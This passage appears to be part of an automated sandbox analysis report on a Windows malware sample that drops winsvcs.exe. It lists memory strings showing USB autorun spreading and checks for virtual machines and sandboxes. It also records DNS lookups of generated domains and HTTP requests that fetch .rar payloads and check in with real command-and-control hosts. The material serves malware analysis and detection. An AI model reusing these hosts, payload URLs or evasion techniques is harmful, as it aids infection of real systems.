        Source: winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
        Source: winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: [autorun]
        Source: winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
        Source: winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: [autorun]
        Source: winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
        Source: winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
        Source: winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload*.*..Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
        Source: winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload*.*..Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
        Source: winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco
        Source: winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
        Source: winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
        Source: winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
        Source: winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
        Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
        Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload*.*..Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
        Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload*.*..Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
        Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco
        Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: [autorun]
        Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00402204 GetTickCount,srand,memset,memset,memset,memset,memset,memset,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,Sleep,_wfopen,fseek,ftell,fclose,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,Sleep,SetFileAttributesW,Sleep,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,Sleep,PathFileExistsW,CopyFileW,SetFileAttributesW,Sleep,PathFileExistsW,_wfopen,fprintf,fclose,SetFileAttributesW,Sleep,FindFirstFileW,memset,_snwprintf,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,memset,memset,_snwprintf,FindCloseChangeNotification,_snwprintf,SetFileAttributesW,PathFileExistsW,PathFileExistsW,GetFileAttributesW,memset,_snwprintf,ShellExecuteW,DeleteFileW,memset,_snwprintf,ShellExecuteW,FindNextFileW,FindClose,0_2_00402204
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_004032A4 memset,memset,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFullPathNameW,CharLowerW,Sleep,Sleep,Sleep,Sleep,PathFindFileNameW,SetFileAttributesW,DeleteFileW,Sleep,CopyFileW,Sleep,Sleep,FindNextFileW,FindClose,0_2_004032A4
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 1_2_006129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_006129E2
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_004032A4 memset,memset,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFullPathNameW,CharLowerW,Sleep,Sleep,Sleep,Sleep,PathFindFileNameW,SetFileAttributesW,DeleteFileW,Sleep,CopyFileW,Sleep,Sleep,FindNextFileW,FindClose,6_2_004032A4
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_00402204 GetTickCount,srand,memset,memset,memset,memset,memset,memset,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,Sleep,_wfopen,fseek,ftell,fclose,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,Sleep,SetFileAttributesW,Sleep,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,Sleep,PathFileExistsW,CopyFileW,SetFileAttributesW,Sleep,PathFileExistsW,_wfopen,fprintf,fclose,SetFileAttributesW,Sleep,FindFirstFileW,memset,_snwprintf,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,memset,memset,_snwprintf,FindCloseChangeNotification,_snwprintf,SetFileAttributesW,PathFileExistsW,PathFileExistsW,GetFileAttributesW,memset,_snwprintf,ShellExecuteW,DeleteFileW,memset,_snwprintf,ShellExecuteW,FindNextFileW,FindClose,6_2_00402204
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 10_2_006E29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,10_2_006E29E2
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 15_2_001829E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,15_2_001829E2
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00402C41 memset,GetModuleFileNameW,Sleep,_wfopen,fseek,ftell,fclose,Sleep,memset,memset,GetLogicalDriveStringsW,GetDriveTypeW,SetErrorMode,GetVolumeInformationW,GetDriveTypeW,Sleep,0_2_00402C41
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

        Networking

        barindex
        Source: unknownDNS traffic detected: query: fifiehsueuufidhfi.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: afeifieuuufufufuf.biz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fiiauediehduefuge.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: srndndubsbsifurfd.ru replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: nousiieiffgogogoo.biz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: iuirshriuisruruuf.net replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fiiauediehduefuge.net replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: iuirshriuisruruuf.ru replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: noeuaoenriusfiruu.net replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eofihsishihiursgu.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fuaiuebndieufeufu.net replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eiifngjfksisiufjf.ru replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: afeifieuuufufufuf.ru replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eiifngjfksisiufjf.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: noeuaoenriusfiruu.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: afeifieuuufufufuf.net replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: nousiieiffgogogoo.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: nnososoosjfeuhueu.in replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fuaiuebndieufeufu.ru replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: noeuaoenriusfiruu.ru replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: nnososoosjfeuhueu.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: ssofhoseuegsgrfnj.net replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eoroooskfogihisrg.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eoroooskfogihisrg.in replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: aiiaiafrzrueuedur.biz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: srndndubsbsifurfd.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: srndndubsbsifurfd.in replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fifiehsueuufidhfi.net replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eoroooskfogihisrg.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: aiiaiafrzrueuedur.in replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: iuirshriuisruruuf.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eoroooskfogihisrg.ru replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: nnososoosjfeuhueu.ru replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eoroooskfogihisrg.biz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: srndndubsbsifurfd.net replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eiifngjfksisiufjf.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: ssofhoseuegsgrfnj.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eofihsishihiursgu.biz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fifiehsueuufidhfi.in replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fuaiuebndieufeufu.in replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: slpsrgpsrhojifdij.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fuaiuebndieufeufu.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: aiiaiafrzrueuedur.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fiiauediehduefuge.biz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: afeifieuuufufufuf.in replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: nnososoosjfeuhueu.net replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fiiauediehduefuge.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: nousiieiffgogogoo.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eiifngjfksisiufjf.net replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: slpsrgpsrhojifdij.in replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fuaiuebndieufeufu.biz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eoroooskfogihisrg.net replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: slpsrgpsrhojifdij.biz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: srndndubsbsifurfd.biz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fifiehsueuufidhfi.ru replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: aiiaiafrzrueuedur.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: iuirshriuisruruuf.biz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: nnososoosjfeuhueu.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eofihsishihiursgu.ru replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: nousiieiffgogogoo.in replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: iuirshriuisruruuf.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: slpsrgpsrhojifdij.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: fiiauediehduefuge.in replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: noeuaoenriusfiruu.in replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: noeuaoenriusfiruu.su replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: srndndubsbsifurfd.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eofihsishihiursgu.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: nousiieiffgogogoo.ru replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: eofihsishihiursgu.in replaycode: Name error (3)
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 799
        Source: unknownNetwork traffic detected: DNS query count 91
        Source: global trafficTCP traffic: 192.168.2.6:49722 -> 44.221.84.105:799
        Source: Joe Sandbox ViewIP Address: 185.215.113.66 185.215.113.66
        Source: Joe Sandbox ViewIP Address: 208.100.26.245 208.100.26.245
        Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnu.ru
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ww88.ssofhoseuegsgrfnu.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: 92.63.197.48
        Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: slpsrgpsrhojifdij.ru
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: aiiaiafrzrueuedur.ru
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fiiauediehduefuge.ru
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.su
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: afeifieuuufufufuf.su
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.in
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.in
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: iuirshriuisruruuf.in
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: slpsrgpsrhojifdij.net
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: aiiaiafrzrueuedur.net
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: nousiieiffgogogoo.net
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eofihsishihiursgu.net
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnj.biz
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: eiifngjfksisiufjf.biz
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: noeuaoenriusfiruu.biz
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fifiehsueuufidhfi.biz
        Source: global trafficHTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: fuaiuebndieufeufu.com
